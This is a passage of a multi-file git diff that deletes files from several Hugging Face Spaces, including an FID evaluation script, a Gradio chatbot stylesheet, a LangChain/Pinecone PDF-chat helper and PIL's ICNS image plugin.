- """ - Copied from: https://github.com/numpy/numpy/blob/fb215c76967739268de71aa4bda55dd1b062bc2e/numpy/lib/format.py#L788-L886 - - Read from file-like object until size bytes are read. - Raises ValueError if not EOF is encountered before size bytes are read. - Non-blocking objects only supported if they derive from io objects. - Required as e.g. ZipExtFile in python 2.6 can return less data than - requested. - """ - data = bytes() - while True: - # io files (default in python3) return None or raise on - # would-block, python2 file will truncate, probably nothing can be - # done about that. note that regular files can't be non-blocking - try: - r = fp.read(size - len(data)) - data += r - if len(r) == 0 or len(data) == size: - break - except io.BlockingIOError: - pass - if len(data) != size: - msg = "EOF: reading %s, expected %d bytes got %d" - raise ValueError(msg % (error_template, size, len(data))) - else: - return data - - -@contextmanager -def _open_npy_file(path: str, arr_name: str): - with open(path, "rb") as f: - with zipfile.ZipFile(f, "r") as zip_f: - if f"{arr_name}.npy" not in zip_f.namelist(): - raise ValueError(f"missing {arr_name} in npz file") - with zip_f.open(f"{arr_name}.npy", "r") as arr_f: - yield arr_f - - -def _download_inception_model(): - if os.path.exists(INCEPTION_V3_PATH): - return - print("downloading InceptionV3 model...") - with requests.get(INCEPTION_V3_URL, stream=True) as r: - r.raise_for_status() - tmp_path = INCEPTION_V3_PATH + ".tmp" - with open(tmp_path, "wb") as f: - for chunk in tqdm(r.iter_content(chunk_size=8192)): - f.write(chunk) - os.rename(tmp_path, INCEPTION_V3_PATH) - - -def _create_feature_graph(input_batch): - _download_inception_model() - prefix = f"{random.randrange(2**32)}_{random.randrange(2**32)}" - with open(INCEPTION_V3_PATH, "rb") as f: - graph_def = tf.GraphDef() - graph_def.ParseFromString(f.read()) - pool3, spatial = tf.import_graph_def( - graph_def, - input_map={f"ExpandDims:0": input_batch}, - return_elements=[FID_POOL_NAME, FID_SPATIAL_NAME], - name=prefix, - ) - _update_shapes(pool3) - spatial = spatial[..., :7] - return pool3, spatial - - -def _create_softmax_graph(input_batch): - _download_inception_model() - prefix = f"{random.randrange(2**32)}_{random.randrange(2**32)}" - with open(INCEPTION_V3_PATH, "rb") as f: - graph_def = tf.GraphDef() - graph_def.ParseFromString(f.read()) - (matmul,) = tf.import_graph_def( - graph_def, return_elements=[f"softmax/logits/MatMul"], name=prefix - ) - w = matmul.inputs[1] - logits = tf.matmul(input_batch, w) - return tf.nn.softmax(logits) - - -def _update_shapes(pool3): - # https://github.com/bioinf-jku/TTUR/blob/73ab375cdf952a12686d9aa7978567771084da42/fid.py#L50-L63 - ops = pool3.graph.get_operations() - for op in ops: - for o in op.outputs: - shape = o.get_shape() - if shape._dims is not None: # pylint: disable=protected-access - # shape = [s.value for s in shape] TF 1.x - shape = [s for s in shape] # TF 2.x - new_shape = [] - for j, s in enumerate(shape): - if s == 1 and j == 0: - new_shape.append(None) - else: - new_shape.append(s) - o.__dict__["_shape_val"] = tf.TensorShape(new_shape) - return pool3 - - -def _numpy_partition(arr, kth, **kwargs): - num_workers = min(cpu_count(), len(arr)) - chunk_size = len(arr) // num_workers - extra = len(arr) % num_workers - - start_idx = 0 - batches = [] - for i in range(num_workers): - size = chunk_size + (1 if i < extra else 0) - batches.append(arr[start_idx : start_idx + size]) - start_idx += size - - with ThreadPool(num_workers) as pool: - return list(pool.map(partial(np.partition, kth=kth, **kwargs), batches)) - - -if __name__ == "__main__": - print(REQUIREMENTS) - main() diff --git a/spaces/dachenchen/HiWantJoin/assets/custom.css b/spaces/dachenchen/HiWantJoin/assets/custom.css deleted file mode 100644 index af5e9f2118b843b3bbd7627ed45e970c20b13bef..0000000000000000000000000000000000000000 --- a/spaces/dachenchen/HiWantJoin/assets/custom.css +++ /dev/null @@ -1,353 +0,0 @@ -:root { - --chatbot-color-light: #F3F3F3; - --chatbot-color-dark: #121111; -} - -#app_title { - font-weight: var(--prose-header-text-weight); - font-size: var(--text-xxl); - line-height: 1.3; - text-align: left; - margin-top: 6px; - white-space: nowrap; -} -#description { - text-align: center; - margin:16px 0 -} - -/* 覆盖gradio的页脚信息QAQ */ -/* footer { - display: none !important; -} */ -#footer { - text-align: center; -} -#footer div { - display: inline-block; -} -#footer .versions{ - font-size: 85%; - opacity: 0.85; -} - -#float_display { - position: absolute; - max-height: 30px; -} -/* user_info */ -#user_info { - white-space: nowrap; - position: absolute; left: 8em; top: .2em; - z-index: var(--layer-2); - box-shadow: var(--block-shadow); - border: none; border-radius: var(--block-label-radius); - background: var(--color-accent); - padding: var(--block-label-padding); - font-size: var(--block-label-text-size); line-height: var(--line-sm); - width: auto; min-height: 30px!important; - opacity: 1; - transition: opacity 0.3s ease-in-out; -} -#user_info .wrap { - opacity: 0; -} -#user_info p { - color: white; - font-weight: var(--block-label-text-weight); -} -#user_info.hideK { - opacity: 0; - transition: opacity 1s ease-in-out; -} - -/* status_display */ -#status_display { - display: flex; - min-height: 2em; - align-items: flex-end; - justify-content: flex-end; -} -#status_display p { - font-size: .85em; - font-family: monospace; - color: var(--body-text-color-subdued); -} - -#status_display { - transition: all 0.6s; -} -#chuanhu_chatbot { - transition: height 0.3s ease; -} - -/* usage_display */ -.insert_block { - position: relative; - margin: 0; - padding: .5em 1em; - box-shadow: var(--block-shadow); - border-width: var(--block-border-width); - border-color: var(--block-border-color); - border-radius: var(--block-radius); - background: var(--block-background-fill); - width: 100%; - line-height: var(--line-sm); - min-height: 2em; -} -#usage_display p, #usage_display span { - margin: 0; - font-size: .85em; - color: var(--body-text-color-subdued); -} -.progress-bar { - background-color: var(--input-background-fill);; - margin: 0 1em; - height: 20px; - border-radius: 10px; - overflow: hidden; -} -.progress { - background-color: var(--block-title-background-fill); - height: 100%; - border-radius: 10px; - text-align: right; - transition: width 0.5s ease-in-out; -} -.progress-text { - /* color: white; */ - color: var(--color-accent) !important; - font-size: 1em !important; - font-weight: bold; - padding-right: 10px; - line-height: 20px; -} - -.apSwitch { - top: 2px; - display: inline-block; - height: 24px; - position: relative; - width: 48px; - border-radius: 12px; -} -.apSwitch input { - display: none !important; -} -.apSlider { - background-color: var(--block-label-background-fill); - bottom: 0; - cursor: pointer; - left: 0; - position: absolute; - right: 0; - top: 0; - transition: .4s; - font-size: 18px; - border-radius: 12px; -} -.apSlider::before { - bottom: -1.5px; - left: 1px; - position: absolute; - transition: .4s; - content: "🌞"; -} -input:checked + .apSlider { - background-color: var(--block-label-background-fill); -} -input:checked + .apSlider::before { - transform: translateX(23px); - content:"🌚"; -} - -#submit_btn, #cancel_btn { - height: 42px !important; -} -#submit_btn::before { - content: url("data:image/svg+xml, %3Csvg width='21px' height='20px' viewBox='0 0 21 20' version='1.1' xmlns='http://www.w3.org/2000/svg' xmlns:xlink='http://www.w3.org/1999/xlink'%3E %3Cg id='page' stroke='none' stroke-width='1' fill='none' fill-rule='evenodd'%3E %3Cg id='send' transform='translate(0.435849, 0.088463)' fill='%23FFFFFF' fill-rule='nonzero'%3E %3Cpath d='M0.579148261,0.0428666046 C0.301105539,-0.0961547561 -0.036517765,0.122307382 0.0032026237,0.420210298 L1.4927172,18.1553639 C1.5125774,18.4334066 1.79062012,18.5922882 2.04880264,18.4929872 L8.24518329,15.8913017 L11.6412765,19.7441794 C11.8597387,19.9825018 12.2370824,19.8832008 12.3165231,19.5852979 L13.9450591,13.4882182 L19.7839562,11.0255541 C20.0619989,10.8865327 20.0818591,10.4694687 19.7839562,10.3105871 L0.579148261,0.0428666046 Z M11.6138902,17.0883151 L9.85385903,14.7195502 L0.718169621,0.618812241 L12.69945,12.9346347 L11.6138902,17.0883151 Z' id='shape'%3E%3C/path%3E %3C/g%3E %3C/g%3E %3C/svg%3E"); - height: 21px; -} -#cancel_btn::before { - content: url("data:image/svg+xml,%3Csvg width='21px' height='21px' viewBox='0 0 21 21' version='1.1' xmlns='http://www.w3.org/2000/svg' xmlns:xlink='http://www.w3.org/1999/xlink'%3E %3Cg id='pg' stroke='none' stroke-width='1' fill='none' fill-rule='evenodd'%3E %3Cpath d='M10.2072007,20.088463 C11.5727865,20.088463 12.8594566,19.8259823 14.067211,19.3010209 C15.2749653,18.7760595 16.3386126,18.0538087 17.2581528,17.1342685 C18.177693,16.2147282 18.8982283,15.1527965 19.4197586,13.9484733 C19.9412889,12.7441501 20.202054,11.4557644 20.202054,10.0833163 C20.202054,8.71773046 19.9395733,7.43106036 19.4146119,6.22330603 C18.8896505,5.01555169 18.1673997,3.95018885 17.2478595,3.0272175 C16.3283192,2.10424615 15.2646719,1.3837109 14.0569176,0.865611739 C12.8491633,0.34751258 11.5624932,0.088463 10.1969073,0.088463 C8.83132146,0.088463 7.54636692,0.34751258 6.34204371,0.865611739 C5.1377205,1.3837109 4.07407321,2.10424615 3.15110186,3.0272175 C2.22813051,3.95018885 1.5058797,5.01555169 0.984349419,6.22330603 C0.46281914,7.43106036 0.202054,8.71773046 0.202054,10.0833163 C0.202054,11.4557644 0.4645347,12.7441501 0.9894961,13.9484733 C1.5144575,15.1527965 2.23670831,16.2147282 3.15624854,17.1342685 C4.07578877,18.0538087 5.1377205,18.7760595 6.34204371,19.3010209 C7.54636692,19.8259823 8.83475258,20.088463 10.2072007,20.088463 Z M10.2072007,18.2562448 C9.07493099,18.2562448 8.01471483,18.0452309 7.0265522,17.6232031 C6.03838956,17.2011753 5.17031614,16.6161693 4.42233192,15.8681851 C3.6743477,15.1202009 3.09105726,14.2521274 2.67246059,13.2639648 C2.25386392,12.2758022 2.04456558,11.215586 2.04456558,10.0833163 C2.04456558,8.95104663 2.25386392,7.89083047 2.67246059,6.90266784 C3.09105726,5.9145052 3.6743477,5.04643178 4.42233192,4.29844756 C5.17031614,3.55046334 6.036674,2.9671729 7.02140552,2.54857623 C8.00613703,2.12997956 9.06463763,1.92068122 10.1969073,1.92068122 C11.329177,1.92068122 12.3911087,2.12997956 13.3827025,2.54857623 C14.3742962,2.9671729 15.2440852,3.55046334 15.9920694,4.29844756 C16.7400537,5.04643178 17.3233441,5.9145052 17.7419408,6.90266784 C18.1605374,7.89083047 18.3698358,8.95104663 18.3698358,10.0833163 C18.3698358,11.215586 18.1605374,12.2758022 17.7419408,13.2639648 C17.3233441,14.2521274 16.7400537,15.1202009 15.9920694,15.8681851 C15.2440852,16.6161693 14.3760118,17.2011753 13.3878492,17.6232031 C12.3996865,18.0452309 11.3394704,18.2562448 10.2072007,18.2562448 Z M7.65444721,13.6242324 L12.7496608,13.6242324 C13.0584616,13.6242324 13.3003556,13.5384544 13.4753427,13.3668984 C13.6503299,13.1953424 13.7378234,12.9585951 13.7378234,12.6566565 L13.7378234,7.49968276 C13.7378234,7.19774418 13.6503299,6.96099688 13.4753427,6.78944087 C13.3003556,6.61788486 13.0584616,6.53210685 12.7496608,6.53210685 L7.65444721,6.53210685 C7.33878414,6.53210685 7.09345904,6.61788486 6.91847191,6.78944087 C6.74348478,6.96099688 6.65599121,7.19774418 6.65599121,7.49968276 L6.65599121,12.6566565 C6.65599121,12.9585951 6.74348478,13.1953424 6.91847191,13.3668984 C7.09345904,13.5384544 7.33878414,13.6242324 7.65444721,13.6242324 Z' id='shape' fill='%23FF3B30' fill-rule='nonzero'%3E%3C/path%3E %3C/g%3E %3C/svg%3E"); - height: 21px; -} -/* list */ -ol:not(.options), ul:not(.options) { - padding-inline-start: 2em !important; -} - -/* 亮色(默认) */ -#chuanhu_chatbot { - background-color: var(--chatbot-color-light) !important; - color: #000000 !important; -} -[data-testid = "bot"] { - background-color: #FFFFFF !important; -} -[data-testid = "user"] { - background-color: #95EC69 !important; -} -/* 暗色 */ -.dark #chuanhu_chatbot { - background-color: var(--chatbot-color-dark) !important; - color: #FFFFFF !important; -} -.dark [data-testid = "bot"] { - background-color: #2C2C2C !important; -} -.dark [data-testid = "user"] { - background-color: #26B561 !important; -} - -/* 屏幕宽度大于等于500px的设备 */ -/* update on 2023.4.8: 高度的细致调整已写入JavaScript */ -@media screen and (min-width: 500px) { - #chuanhu_chatbot { - height: calc(100vh - 200px); - } - #chuanhu_chatbot .wrap { - max-height: calc(100vh - 200px - var(--line-sm)*1rem - 2*var(--block-label-margin) ); - } -} -/* 屏幕宽度小于500px的设备 */ -@media screen and (max-width: 499px) { - #chuanhu_chatbot { - height: calc(100vh - 140px); - } - #chuanhu_chatbot .wrap { - max-height: calc(100vh - 140px - var(--line-sm)*1rem - 2*var(--block-label-margin) ); - } - [data-testid = "bot"] { - max-width: 98% !important; - } - #app_title h1{ - letter-spacing: -1px; font-size: 22px; - } -} -/* 对话气泡 */ -[class *= "message"] { - border-radius: var(--radius-xl) !important; - border: none; - padding: var(--spacing-xl) !important; - font-size: var(--text-md) !important; - line-height: var(--line-md) !important; - min-height: calc(var(--text-md)*var(--line-md) + 2*var(--spacing-xl)); - min-width: calc(var(--text-md)*var(--line-md) + 2*var(--spacing-xl)); -} -[data-testid = "bot"] { - max-width: 85%; - border-bottom-left-radius: 0 !important; -} -[data-testid = "user"] { - max-width: 85%; - width: auto !important; - border-bottom-right-radius: 0 !important; -} -/* 表格 */ -table { - margin: 1em 0; - border-collapse: collapse; - empty-cells: show; -} -td,th { - border: 1.2px solid var(--border-color-primary) !important; - padding: 0.2em; -} -thead { - background-color: rgba(175,184,193,0.2); -} -thead th { - padding: .5em .2em; -} -/* 行内代码 */ -code { - display: inline; - white-space: break-spaces; - border-radius: 6px; - margin: 0 2px 0 2px; - padding: .2em .4em .1em .4em; - background-color: rgba(175,184,193,0.2); -} -/* 代码块 */ -pre code { - display: block; - overflow: auto; - white-space: pre; - background-color: hsla(0, 0%, 0%, 80%)!important; - border-radius: 10px; - padding: 1.4em 1.2em 0em 1.4em; - margin: 1.2em 2em 1.2em 0.5em; - color: #FFF; - box-shadow: 6px 6px 16px hsla(0, 0%, 0%, 0.2); -} -/* 代码高亮样式 */ -.highlight .hll { background-color: #49483e } -.highlight .c { color: #75715e } /* Comment */ -.highlight .err { color: #960050; background-color: #1e0010 } /* Error */ -.highlight .k { color: #66d9ef } /* Keyword */ -.highlight .l { color: #ae81ff } /* Literal */ -.highlight .n { color: #f8f8f2 } /* Name */ -.highlight .o { color: #f92672 } /* Operator */ -.highlight .p { color: #f8f8f2 } /* Punctuation */ -.highlight .ch { color: #75715e } /* Comment.Hashbang */ -.highlight .cm { color: #75715e } /* Comment.Multiline */ -.highlight .cp { color: #75715e } /* Comment.Preproc */ -.highlight .cpf { color: #75715e } /* Comment.PreprocFile */ -.highlight .c1 { color: #75715e } /* Comment.Single */ -.highlight .cs { color: #75715e } /* Comment.Special */ -.highlight .gd { color: #f92672 } /* Generic.Deleted */ -.highlight .ge { font-style: italic } /* Generic.Emph */ -.highlight .gi { color: #a6e22e } /* Generic.Inserted */ -.highlight .gs { font-weight: bold } /* Generic.Strong */ -.highlight .gu { color: #75715e } /* Generic.Subheading */ -.highlight .kc { color: #66d9ef } /* Keyword.Constant */ -.highlight .kd { color: #66d9ef } /* Keyword.Declaration */ -.highlight .kn { color: #f92672 } /* Keyword.Namespace */ -.highlight .kp { color: #66d9ef } /* Keyword.Pseudo */ -.highlight .kr { color: #66d9ef } /* Keyword.Reserved */ -.highlight .kt { color: #66d9ef } /* Keyword.Type */ -.highlight .ld { color: #e6db74 } /* Literal.Date */ -.highlight .m { color: #ae81ff } /* Literal.Number */ -.highlight .s { color: #e6db74 } /* Literal.String */ -.highlight .na { color: #a6e22e } /* Name.Attribute */ -.highlight .nb { color: #f8f8f2 } /* Name.Builtin */ -.highlight .nc { color: #a6e22e } /* Name.Class */ -.highlight .no { color: #66d9ef } /* Name.Constant */ -.highlight .nd { color: #a6e22e } /* Name.Decorator */ -.highlight .ni { color: #f8f8f2 } /* Name.Entity */ -.highlight .ne { color: #a6e22e } /* Name.Exception */ -.highlight .nf { color: #a6e22e } /* Name.Function */ -.highlight .nl { color: #f8f8f2 } /* Name.Label */ -.highlight .nn { color: #f8f8f2 } /* Name.Namespace */ -.highlight .nx { color: #a6e22e } /* Name.Other */ -.highlight .py { color: #f8f8f2 } /* Name.Property */ -.highlight .nt { color: #f92672 } /* Name.Tag */ -.highlight .nv { color: #f8f8f2 } /* Name.Variable */ -.highlight .ow { color: #f92672 } /* Operator.Word */ -.highlight .w { color: #f8f8f2 } /* Text.Whitespace */ -.highlight .mb { color: #ae81ff } /* Literal.Number.Bin */ -.highlight .mf { color: #ae81ff } /* Literal.Number.Float */ -.highlight .mh { color: #ae81ff } /* Literal.Number.Hex */ -.highlight .mi { color: #ae81ff } /* Literal.Number.Integer */ -.highlight .mo { color: #ae81ff } /* Literal.Number.Oct */ -.highlight .sa { color: #e6db74 } /* Literal.String.Affix */ -.highlight .sb { color: #e6db74 } /* Literal.String.Backtick */ -.highlight .sc { color: #e6db74 } /* Literal.String.Char */ -.highlight .dl { color: #e6db74 } /* Literal.String.Delimiter */ -.highlight .sd { color: #e6db74 } /* Literal.String.Doc */ -.highlight .s2 { color: #e6db74 } /* Literal.String.Double */ -.highlight .se { color: #ae81ff } /* Literal.String.Escape */ -.highlight .sh { color: #e6db74 } /* Literal.String.Heredoc */ -.highlight .si { color: #e6db74 } /* Literal.String.Interpol */ -.highlight .sx { color: #e6db74 } /* Literal.String.Other */ -.highlight .sr { color: #e6db74 } /* Literal.String.Regex */ -.highlight .s1 { color: #e6db74 } /* Literal.String.Single */ -.highlight .ss { color: #e6db74 } /* Literal.String.Symbol */ -.highlight .bp { color: #f8f8f2 } /* Name.Builtin.Pseudo */ -.highlight .fm { color: #a6e22e } /* Name.Function.Magic */ -.highlight .vc { color: #f8f8f2 } /* Name.Variable.Class */ -.highlight .vg { color: #f8f8f2 } /* Name.Variable.Global */ -.highlight .vi { color: #f8f8f2 } /* Name.Variable.Instance */ -.highlight .vm { color: #f8f8f2 } /* Name.Variable.Magic */ -.highlight .il { color: #ae81ff } /* Literal.Number.Integer.Long */ diff --git a/spaces/daedalus314/quantum-lora-quote-generation/README.md b/spaces/daedalus314/quantum-lora-quote-generation/README.md deleted file mode 100644 index ce778077cfa90b9c38212ba8f6939c8fa3f7f018..0000000000000000000000000000000000000000 --- a/spaces/daedalus314/quantum-lora-quote-generation/README.md +++ /dev/null @@ -1,12 +0,0 @@ ---- -title: Quantum Lora Quote Generation -emoji: 💻 -colorFrom: yellow -colorTo: pink -sdk: gradio -sdk_version: 3.35.2 -app_file: app.py -pinned: false ---- - -Check out the configuration reference at https://huggingface.co/docs/hub/spaces-config-reference diff --git a/spaces/darthPanda/chatpdf_app/utils.py b/spaces/darthPanda/chatpdf_app/utils.py deleted file mode 100644 index 38e737a6f2675407e4da46c507d8589e053003ea..0000000000000000000000000000000000000000 --- a/spaces/darthPanda/chatpdf_app/utils.py +++ /dev/null @@ -1,84 +0,0 @@ -from langchain.document_loaders import DirectoryLoader -from langchain.text_splitter import RecursiveCharacterTextSplitter -from langchain.embeddings import SentenceTransformerEmbeddings -from sentence_transformers import SentenceTransformer -import pinecone -from langchain.vectorstores import Pinecone -from langchain.document_loaders import PyPDFLoader -import tempfile -import streamlit as st -import openai - -# To create embeddings on hard disk -@st.cache_resource() -def get_embeddings_model(): - model = SentenceTransformer('all-MiniLM-L6-v2') - embeddings = SentenceTransformerEmbeddings(model_name="all-MiniLM-L6-v2") - return model, embeddings - -model, embeddings = get_embeddings_model() - -def ingest( - uploaded_document, - pinecone_api_key, - pinecone_env, - pinecone_index_namespace, - chunk_size=500, - chunk_overlap=20 - ): - with tempfile.NamedTemporaryFile(delete=False) as tf: - tf.write(uploaded_document.getbuffer()) - file_path = tf.name - loader = PyPDFLoader(file_path) - documents = loader.load() - text_splitter = RecursiveCharacterTextSplitter(chunk_size=chunk_size, chunk_overlap=chunk_overlap) - docs = text_splitter.split_documents(documents) - # embeddings = get_embeddings_model() - pinecone.init( - api_key=pinecone_api_key, - environment=pinecone_env - ) - index_name = pinecone_index_namespace - try: - index = Pinecone.from_documents(docs, embeddings, index_name=index_name) - st.success('Document uploaded to Pinecone database successfully') - except Exception as error_message: - st.error(error_message) - -# # To create embeddings on hard disk -# # !pip install chromadb -# # from langchain.vectorstores import Chroma -# # persist_directory = './data/embeddings' -# # vStore = Chroma.from_documents(docs, embeddings, persist_directory=persist_directory) - - -def query_refiner(conversation, query): - response = openai.Completion.create( - model="text-davinci-003", - prompt=f"Given the following user query and conversation log, formulate a question that would be the most relevant to provide the user with an answer from a knowledge base.\n\nCONVERSATION LOG: \n{conversation}\n\nQuery: {query}\n\nRefined Query:", - temperature=0.7, - max_tokens=256, - top_p=1, - frequency_penalty=0, - presence_penalty=0 - ) - return response['choices'][0]['text'] - - -def find_match(input, pinecone_api_key, pinecone_env, pinecone_index_namespace): - pinecone.init( - api_key=pinecone_api_key, - environment=pinecone_env - ) - index = pinecone.Index(pinecone_index_namespace) - input_em = model.encode(input).tolist() - result = index.query(input_em, top_k=2, includeMetadata=True) - return result['matches'][0]['metadata']['text']+"\n"+result['matches'][1]['metadata']['text'] - - -def get_conversation_string(): - conversation_string = "" - for i in range(len(st.session_state['responses'])-1): - conversation_string += "Human: "+st.session_state['requests'][i] + "\n" - conversation_string += "Bot: "+ st.session_state['responses'][i+1] + "\n" - return conversation_string \ No newline at end of file diff --git a/spaces/dcarpintero/nlp-summarizer-pegasus/.venv/lib/python3.9/site-packages/PIL/IcnsImagePlugin.py b/spaces/dcarpintero/nlp-summarizer-pegasus/.venv/lib/python3.9/site-packages/PIL/IcnsImagePlugin.py deleted file mode 100644 index 27cb89f735e2a1883b2b52ee42fd9ba34c5805fb..0000000000000000000000000000000000000000 --- a/spaces/dcarpintero/nlp-summarizer-pegasus/.venv/lib/python3.9/site-packages/PIL/IcnsImagePlugin.py +++ /dev/null @@ -1,399 +0,0 @@ -# -# The Python Imaging Library. -# $Id$ -# -# macOS icns file decoder, based on icns.py by Bob Ippolito. -# -# history: -# 2004-10-09 fl Turned into a PIL plugin; removed 2.3 dependencies. -# 2020-04-04 Allow saving on all operating systems. -# -# Copyright (c) 2004 by Bob Ippolito. -# Copyright (c) 2004 by Secret Labs. -# Copyright (c) 2004 by Fredrik Lundh. -# Copyright (c) 2014 by Alastair Houghton. -# Copyright (c) 2020 by Pan Jing. -# -# See the README file for information on usage and redistribution. -# - -import io -import os -import struct -import sys - -from . import Image, ImageFile, PngImagePlugin, features - -enable_jpeg2k = features.check_codec("jpg_2000") -if enable_jpeg2k: - from . import Jpeg2KImagePlugin - -MAGIC = b"icns" -HEADERSIZE = 8 - - -def nextheader(fobj): - return struct.unpack(">4sI", fobj.read(HEADERSIZE)) - - -def read_32t(fobj, start_length, size): - # The 128x128 icon seems to have an extra header for some reason. - (start, length) = start_length - fobj.seek(start) - sig = fobj.read(4) - if sig != b"\x00\x00\x00\x00": - msg = "Unknown signature, expecting 0x00000000" - raise SyntaxError(msg) - return read_32(fobj, (start + 4, length - 4), size) - - -def read_32(fobj, start_length, size): - """ - Read a 32bit RGB icon resource. Seems to be either uncompressed or - an RLE packbits-like scheme. - """ - (start, length) = start_length - fobj.seek(start) - pixel_size = (size[0] * size[2], size[1] * size[2]) - sizesq = pixel_size[0] * pixel_size[1] - if length == sizesq * 3: - # uncompressed ("RGBRGBGB") - indata = fobj.read(length) - im = Image.frombuffer("RGB", pixel_size, indata, "raw", "RGB", 0, 1) - else: - # decode image - im = Image.new("RGB", pixel_size, None) - for band_ix in range(3): - data = [] - bytesleft = sizesq - while bytesleft > 0: - byte = fobj.read(1) - if not byte: - break - byte = byte[0] - if byte & 0x80: - blocksize = byte - 125 - byte = fobj.read(1) - for i in range(blocksize): - data.append(byte) - else: - blocksize = byte + 1 - data.append(fobj.read(blocksize)) - bytesleft -= blocksize - if bytesleft <= 0: - break - if bytesleft != 0: - msg = f"Error reading channel [{repr(bytesleft)} left]" - raise SyntaxError(msg) - band = Image.frombuffer("L", pixel_size, b"".join(data), "raw", "L", 0, 1) - im.im.putband(band.im, band_ix) - return {"RGB": im} - - -def read_mk(fobj, start_length, size): - # Alpha masks seem to be uncompressed - start = start_length[0] - fobj.seek(start) - pixel_size = (size[0] * size[2], size[1] * size[2]) - sizesq = pixel_size[0] * pixel_size[1] - band = Image.frombuffer("L", pixel_size, fobj.read(sizesq), "raw", "L", 0, 1) - return {"A": band} - - -def read_png_or_jpeg2000(fobj, start_length, size): - (start, length) = start_length - fobj.seek(start) - sig = fobj.read(12) - if sig[:8] == b"\x89PNG\x0d\x0a\x1a\x0a": - fobj.seek(start) - im = PngImagePlugin.PngImageFile(fobj) - Image._decompression_bomb_check(im.size) - return {"RGBA": im} - elif ( - sig[:4] == b"\xff\x4f\xff\x51" - or sig[:4] == b"\x0d\x0a\x87\x0a" - or sig == b"\x00\x00\x00\x0cjP \x0d\x0a\x87\x0a" - ): - if not enable_jpeg2k: - msg = ( - "Unsupported icon subimage format (rebuild PIL " - "with JPEG 2000 support to fix this)" - ) - raise ValueError(msg) - # j2k, jpc or j2c - fobj.seek(start) - jp2kstream = fobj.read(length) - f = io.BytesIO(jp2kstream) - im = Jpeg2KImagePlugin.Jpeg2KImageFile(f) - Image._decompression_bomb_check(im.size) - if im.mode != "RGBA": - im = im.convert("RGBA") - return {"RGBA": im} - else: - msg = "Unsupported icon subimage format" - raise ValueError(msg) - - -class IcnsFile: - SIZES = { - (512, 512, 2): [(b"ic10", read_png_or_jpeg2000)], - (512, 512, 1): [(b"ic09", read_png_or_jpeg2000)], - (256, 256, 2): [(b"ic14", read_png_or_jpeg2000)], - (256, 256, 1): [(b"ic08", read_png_or_jpeg2000)], - (128, 128, 2): [(b"ic13", read_png_or_jpeg2000)], - (128, 128, 1): [ - (b"ic07", read_png_or_jpeg2000), - (b"it32", read_32t), - (b"t8mk", read_mk), - ], - (64, 64, 1): [(b"icp6", read_png_or_jpeg2000)], - (32, 32, 2): [(b"ic12", read_png_or_jpeg2000)], - (48, 48, 1): [(b"ih32", read_32), (b"h8mk", read_mk)], - (32, 32, 1): [ - (b"icp5", read_png_or_jpeg2000), - (b"il32", read_32), - (b"l8mk", read_mk), - ], - (16, 16, 2): [(b"ic11", read_png_or_jpeg2000)], - (16, 16, 1): [ - (b"icp4", read_png_or_jpeg2000), - (b"is32", read_32), - (b"s8mk", read_mk), - ], - } - - def __init__(self, fobj): - """ - fobj is a file-like object as an icns resource - """ - # signature : (start, length) - self.dct = dct = {} - self.fobj = fobj - sig, filesize = nextheader(fobj) - if not _accept(sig): - msg = "not an icns file" - raise SyntaxError(msg) - i = HEADERSIZE - while i < filesize: - sig, blocksize = nextheader(fobj) - if blocksize <= 0: - msg = "invalid block header" - raise SyntaxError(msg) - i += HEADERSIZE - blocksize -= HEADERSIZE - dct[sig] = (i, blocksize) - fobj.seek(blocksize, io.SEEK_CUR) - i += blocksize - - def itersizes(self): - sizes = [] - for size, fmts in self.SIZES.items(): - for fmt, reader in fmts: - if fmt in self.dct: - sizes.append(size) - break - return sizes - - def bestsize(self): - sizes = self.itersizes() - if not sizes: - msg = "No 32bit icon resources found" - raise SyntaxError(msg) - return max(sizes) - - def dataforsize(self, size): - """ - Get an icon resource as {channel: array}. Note that - the arrays are bottom-up like windows bitmaps and will likely - need to be flipped or transposed in some way. - """ - dct = {} - for code, reader in self.SIZES[size]: - desc = self.dct.get(code) - if desc is not None: - dct.update(reader(self.fobj, desc, size)) - return dct - - def getimage(self, size=None): - if size is None: - size = self.bestsize() - if len(size) == 2: - size = (size[0], size[1], 1) - channels = self.dataforsize(size) - - im = channels.get("RGBA", None) - if im: - return im - - im = channels.get("RGB").copy() - try: - im.putalpha(channels["A"]) - except KeyError: - pass - return im - - -## -# Image plugin for Mac OS icons. - - -class IcnsImageFile(ImageFile.ImageFile): - """ - PIL image support for Mac OS .icns files. - Chooses the best resolution, but will possibly load - a different size image if you mutate the size attribute - before calling 'load'. - - The info dictionary has a key 'sizes' that is a list - of sizes that the icns file has. - """ - - format = "ICNS" - format_description = "Mac OS icns resource" - - def _open(self): - self.icns = IcnsFile(self.fp) - self.mode = "RGBA" - self.info["sizes"] = self.icns.itersizes() - self.best_size = self.icns.bestsize() - self.size = ( - self.best_size[0] * self.best_size[2], - self.best_size[1] * self.best_size[2], - ) - - @property - def size(self): - return self._size - - @size.setter - def size(self, value): - info_size = value - if info_size not in self.info["sizes"] and len(info_size) == 2: - info_size = (info_size[0], info_size[1], 1) - if ( - info_size not in self.info["sizes"] - and len(info_size) == 3 - and info_size[2] == 1 - ): - simple_sizes = [ - (size[0] * size[2], size[1] * size[2]) for size in self.info["sizes"] - ] - if value in simple_sizes: - info_size = self.info["sizes"][simple_sizes.index(value)] - if info_size not in self.info["sizes"]: - msg = "This is not one of the allowed sizes of this image" - raise ValueError(msg) - self._size = value - - def load(self): - if len(self.size) == 3: - self.best_size = self.size - self.size = ( - self.best_size[0] * self.best_size[2], - self.best_size[1] * self.best_size[2], - ) - - px = Image.Image.load(self) - if self.im is not None and self.im.size == self.size: - # Already loaded - return px - self.load_prepare() - # This is likely NOT the best way to do it, but whatever. - im = self.icns.getimage(self.best_size) - - # If this is a PNG or JPEG 2000, it won't be loaded yet - px = im.load() - - self.im = im.im - self.mode = im.mode - self.size = im.size - - return px - - -def _save(im, fp, filename): - """ - Saves the image as a series of PNG files, - that are then combined into a .icns file. - """ - if hasattr(fp, "flush"): - fp.flush() - - sizes = { - b"ic07": 128, - b"ic08": 256, - b"ic09": 512, - b"ic10": 1024, - b"ic11": 32, - b"ic12": 64, - b"ic13": 256, - b"ic14": 512, - } - provided_images = {im.width: im for im in im.encoderinfo.get("append_images", [])} - size_streams = {} - for size in set(sizes.values()): - image = ( - provided_images[size] - if size in provided_images - else im.resize((size, size)) - ) - - temp = io.BytesIO() - image.save(temp, "png") - size_streams[size] = temp.getvalue() - - entries = [] - for type, size in sizes.items(): - stream = size_streams[size] - entries.append( - {"type": type, "size": HEADERSIZE + len(stream), "stream": stream} - ) - - # Header - fp.write(MAGIC) - file_length = HEADERSIZE # Header - file_length 